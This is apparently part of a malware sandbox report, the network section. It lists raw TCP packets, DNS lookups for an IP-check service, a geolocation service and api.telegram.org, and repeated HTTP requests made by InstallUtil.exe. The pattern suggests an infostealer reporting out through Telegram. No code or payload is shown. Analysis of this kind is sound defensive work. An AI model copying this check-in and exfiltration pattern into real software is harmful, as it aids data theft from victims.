                                                Oct 8, 2024 12:45:20.706177950 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706379890 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706418037 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706542015 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.706671953 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.706975937 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707040071 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707067966 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.707084894 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.707326889 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707369089 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.707871914 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707923889 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.707925081 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.708012104 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708029985 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.708045959 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.708159924 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708515882 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708528996 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.708821058 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.708873987 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.708939075 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.709114075 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.709131956 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.710355043 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.718184948 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.885792971 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:20.936822891 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:20.981102943 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.981177092 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:20.981254101 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.987612963 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:20.987641096 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.169584036 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.172380924 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:21.172465086 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.177431107 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:21.180152893 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:21.180188894 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339502096 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339612961 CEST44349754188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339613914 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.339688063 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.339853048 CEST44349755188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.340044975 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.340284109 CEST49754443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.340295076 CEST49755443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.346617937 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.348725080 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.348795891 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.352096081 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.352277994 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.354733944 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.354746103 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.355190039 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.368746996 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.374356031 CEST8049752158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.374433041 CEST4975280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.376631975 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.381903887 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.382021904 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.382710934 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.387619972 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.400193930 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.405128002 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.405611992 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.405618906 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.407651901 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.412556887 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.435102940 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.475440025 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.549252033 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.549474001 CEST44349756188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.549587011 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.622284889 CEST49756443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.627741098 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.632839918 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.782272100 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.833815098 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.833853006 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.833933115 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.833987951 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:22.834300995 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.834314108 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.945955038 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.947171926 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.947205067 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.947279930 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.947526932 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.947540045 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.975163937 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:22.980866909 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.980916977 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:22.980977058 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:22.999440908 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.017214060 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.017232895 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.030601978 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.292041063 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.293598890 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.293627977 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.428581953 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.430345058 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.430357933 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.461484909 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.461581945 CEST44349769188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.461626053 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.462038040 CEST49769443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.465539932 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.466770887 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.470918894 CEST8049746158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.470972061 CEST4974680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.471532106 CEST8049776158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.471589088 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.471653938 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.476408005 CEST8049776158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.478528976 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.479931116 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.479954004 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.570257902 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.570491076 CEST44349770188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.570542097 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.570873022 CEST49770443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.582813025 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.588159084 CEST8049763158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.588249922 CEST4976380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.590090990 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:23.590153933 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:23.590239048 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:23.590578079 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:23.590609074 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:23.638765097 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.639214993 CEST44349771188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:23.639358997 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.639700890 CEST49771443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:23.643857956 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.644515038 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.649516106 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.649600983 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.649667978 CEST8049762158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:23.649684906 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.649722099 CEST4976280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:23.654736042 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:24.033001900 CEST8049776158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:24.034495115 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.034548998 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.034845114 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.035058022 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.035078049 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.077496052 CEST4977680192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:24.229913950 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.230019093 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.231731892 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.231749058 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.232079029 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.232850075 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:24.234100103 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.234168053 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.234256029 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.234283924 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.234596014 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.234610081 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.279400110 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.280591011 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:24.473495960 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.473640919 CEST44349778149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:24.473716974 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.487277031 CEST49778443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:24.495922089 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:24.497636080 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:24.497688055 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.566428900 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.566701889 CEST44349780188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.566869020 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.569046974 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.577276945 CEST49780443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.620424986 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.620476007 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.720218897 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.725286961 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.725445032 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.726545095 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.727993011 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.728230953 CEST44349785188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:25.728305101 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.728950024 CEST49785443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:25.731544971 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.739100933 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.740328074 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.744765997 CEST8049779158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.744832039 CEST4977980192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.745327950 CEST8049788158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:25.745408058 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.745522022 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:25.750313044 CEST8049788158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:26.295466900 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:26.297121048 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.297173023 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.297257900 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.297597885 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.297616005 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.325903893 CEST8049788158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:26.327471018 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.327564955 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.327666998 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.327943087 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.327979088 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.343108892 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:26.374363899 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:26.885333061 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.887414932 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.887434959 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.906704903 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:26.908833981 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:26.908873081 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.018052101 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.018285036 CEST44349794188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.018349886 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.019221067 CEST49794443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.023652077 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.025101900 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.029055119 CEST8049787158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.029123068 CEST4978780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.030039072 CEST8049801158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.030122042 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.030214071 CEST4980180192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.035017014 CEST8049801158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:27.041320086 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.041557074 CEST44349795188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:27.042135954 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.042504072 CEST49795443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:27.045635939 CEST4978880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.047168016 CEST4980280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:27.051486015 CEST8049788158.101.44.242192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 12:44:57.919799089 CEST | 55954 | 53 | 192.168.2.5 | 1.1.1.1
Oct 8, 2024 12:44:57.927849054 CEST | 53 | 55954 | 1.1.1.1 | 192.168.2.5
Oct 8, 2024 12:44:58.893565893 CEST | 62579 | 53 | 192.168.2.5 | 1.1.1.1
Oct 8, 2024 12:44:58.901654005 CEST | 53 | 62579 | 1.1.1.1 | 192.168.2.5
Oct 8, 2024 12:45:23.582640886 CEST | 54439 | 53 | 192.168.2.5 | 1.1.1.1
Oct 8, 2024 12:45:23.589468002 CEST | 53 | 54439 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 12:44:57.919799089 CEST | 192.168.2.5 | 1.1.1.1 | 0x7530 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:44:58.893565893 CEST | 192.168.2.5 | 1.1.1.1 | 0xed9d | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:45:23.582640886 CEST | 192.168.2.5 | 1.1.1.1 | 0xfd98 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 12:44:57.927849054 CEST | 1.1.1.1 | 192.168.2.5 | 0x7530 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 12:44:57.927849054 CEST | 1.1.1.1 | 192.168.2.5 | 0x7530 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:44:57.927849054 CEST | 1.1.1.1 | 192.168.2.5 | 0x7530 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:44:57.927849054 CEST | 1.1.1.1 | 192.168.2.5 | 0x7530 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:44:57.927849054 CEST | 1.1.1.1 | 192.168.2.5 | 0x7530 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:44:57.927849054 CEST | 1.1.1.1 | 192.168.2.5 | 0x7530 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:44:58.901654005 CEST | 1.1.1.1 | 192.168.2.5 | 0xed9d | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:44:58.901654005 CEST | 1.1.1.1 | 192.168.2.5 | 0xed9d | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 12:45:23.589468002 CEST | 1.1.1.1 | 192.168.2.5 | 0xfd98 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false

                                                • reallyfreegeoip.org
                                                • api.telegram.org
                                                • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 12:44:57.939714909 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
Oct 8, 2024 12:44:58.518382072 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 6bd73b67df3aa21f455cfcc4793e9c51
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 12:44:58.557729959 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
Oct 8, 2024 12:44:58.714046001 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: ea73b4f118492b2dd3f80a98ebed17d5
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 12:44:59.575120926 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
Oct 8, 2024 12:44:59.730695963 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:59 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: ac92ee8a7cee845de03b52f5b4c3d142
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 12:45:00.380058050 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
Oct 8, 2024 12:45:05.668442011 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 50331549242963d1c92551b5be7e9014
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49709 | 158.101.44.242 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 12:45:06.423011065 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
Oct 8, 2024 12:45:10.920150995 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 3d4e2153e9645756c74d4887287c58ba
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49710 | 158.101.44.242 | 80 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 12:45:09.949476004 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
Oct 8, 2024 12:45:13.348675966 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:13 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 1ffca4ed7abb2655bf8baf575b9f0203
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 12:45:13.352572918 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
Oct 8, 2024 12:45:14.353023052 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:14 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 77321d8ad66524bcefb92783b1e646ba
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 12:45:15.158042908 CEST | 127 | OUT | GET / HTTP/1.1
